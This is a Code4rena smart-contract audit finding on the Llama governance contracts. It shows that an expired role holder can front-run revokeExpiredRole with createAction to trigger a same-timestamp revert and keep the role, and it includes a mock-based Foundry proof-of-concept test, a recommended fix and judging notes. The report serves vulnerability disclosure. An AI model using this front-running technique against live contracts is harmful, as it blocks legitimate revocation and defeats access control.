Platform: Code4rena
Start Date: 06/06/2023
Pot Size: $60,500 USDC
Total HM: 5
Participants: 50
Period: 8 days
Judge: gzeon
Id: 246
League: ETH
Rank: 14/50
Findings: 1
Award: $446.81
🌟 Selected for report: 0
🚀 Solo Findings: 0
446.8103 USDC - $446.81
Malicious user can front-run "revokeExpiredRole" with "createAction" to make it revert due to the "_assertNoActionCreationsAtCurrentTimestamp" check, so the revocation of a malicious role holder's expired role can be blocked indefinitely.
```solidity
function _assertNoActionCreationsAtCurrentTimestamp() internal view {
    if (llamaExecutor == address(0)) return; // Skip check during initialization.
    address llamaCore = LlamaExecutor(llamaExecutor).LLAMA_CORE();
    // Timestamp of the most recent action creation recorded by LlamaCore.
    uint256 lastActionCreation = LlamaCore(llamaCore).getLastActionTimestamp();
    // Any policy change in the same block as an action creation is rejected.
    if (lastActionCreation == block.timestamp) revert ActionCreationAtSameTimestamp();
}
```
When anyone calls "revokeExpiredRole" to revoke an expired role, and the role holder still has permission to create actions, the holder can front-run that transaction with a call to "createAction". The "createAction" call lands first in the block and sets the last action-creation timestamp to block.timestamp, so the "_assertNoActionCreationsAtCurrentTimestamp" check in "revokeExpiredRole" reverts with ActionCreationAtSameTimestamp. The holder keeps the role, and can repeat this for every future revocation attempt at the cost of one transaction per block.
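To make the race concrete, the following added example (not code from the Llama repository or from the original finding) models the two contracts with minimal stand-ins and reproduces the front-run in a Foundry test. Everything here is assumed for illustration: `MockCore`, `MockPolicy`, `grantRole`, the `roleExpiration` mapping and the premise, taken from the finding, that a holder whose role has expired still passes the action-creation permission check until the role is actually revoked.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

import "forge-std/Test.sol";

// Stand-in for LlamaCore (assumption, not the real contract): records when the
// last action was created and gates creation on the caller holding a role.
contract MockCore {
    MockPolicy public policy;
    uint256 public lastActionTimestamp;

    function setPolicy(MockPolicy _policy) external { policy = _policy; }

    function createAction() external returns (uint256) {
        // Premise of the finding: an expired-but-unrevoked holder still passes this check.
        require(policy.hasRole(msg.sender), "no action creation permission");
        lastActionTimestamp = block.timestamp;
        return lastActionTimestamp;
    }

    function getLastActionTimestamp() external view returns (uint256) {
        return lastActionTimestamp;
    }
}

// Stand-in for LlamaPolicy (assumption): a single role with an expiration per holder.
contract MockPolicy {
    error ActionCreationAtSameTimestamp();
    error RoleNotExpired();

    MockCore public immutable core;
    mapping(address => uint64) public roleExpiration; // holder => expiration timestamp

    constructor(MockCore _core) { core = _core; }

    function grantRole(address holder, uint64 expiration) external {
        roleExpiration[holder] = expiration;
    }

    // Role counts as held until it is explicitly revoked.
    function hasRole(address holder) public view returns (bool) {
        return roleExpiration[holder] != 0;
    }

    // Same condition as the check quoted in the finding.
    function _assertNoActionCreationsAtCurrentTimestamp() internal view {
        if (core.getLastActionTimestamp() == block.timestamp) revert ActionCreationAtSameTimestamp();
    }

    function revokeExpiredRole(address holder) external {
        _assertNoActionCreationsAtCurrentTimestamp();
        uint64 expiration = roleExpiration[holder];
        if (expiration == 0 || expiration >= block.timestamp) revert RoleNotExpired();
        delete roleExpiration[holder];
    }
}

contract FrontrunRevokeTest is Test {
    MockCore core;
    MockPolicy policy;
    address attacker = address(0xA11CE); // constructed address for the malicious holder

    function setUp() public {
        core = new MockCore();
        policy = new MockPolicy(core);
        core.setPolicy(policy);
        policy.grantRole(attacker, uint64(block.timestamp + 1 days));
        vm.warp(block.timestamp + 2 days); // the role is now expired
    }

    // The attacker's createAction is ordered before the honest revocation in the same block.
    function testFrontrunBlocksRevocation() public {
        vm.prank(attacker);
        core.createAction();
        vm.expectRevert(MockPolicy.ActionCreationAtSameTimestamp.selector);
        policy.revokeExpiredRole(attacker);
        assertTrue(policy.hasRole(attacker)); // role survives the revocation attempt
    }

    // Without a same-block action creation the revocation goes through.
    function testRevokeSucceedsInLaterBlock() public {
        vm.prank(attacker);
        core.createAction();
        vm.warp(block.timestamp + 12); // a later block
        policy.revokeExpiredRole(attacker);
        assertFalse(policy.hasRole(attacker));
    }
}
```

Run it with `forge test` in a project that has forge-std installed. The first test shows the denial of service from the finding: as long as the holder lands one `createAction` per block ahead of each revocation attempt, `revokeExpiredRole` never succeeds. Removing the `_assertNoActionCreationsAtCurrentTimestamp` call from `revokeExpiredRole`, as the finding recommends, makes the first test's expected revert disappear and the revocation succeed in the same block.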
Manual Review
Delete "_assertNoActionCreationsAtCurrentTimestamp"
DoS
#0 - c4-pre-sort
2023-06-19T11:45:47Z
0xSorryNotSorry marked the issue as duplicate of #209
#1 - c4-judge
2023-07-02T11:13:15Z
gzeon-c4 changed the severity to 2 (Med Risk)
#2 - c4-judge
2023-07-02T11:13:42Z
gzeon-c4 marked the issue as satisfactory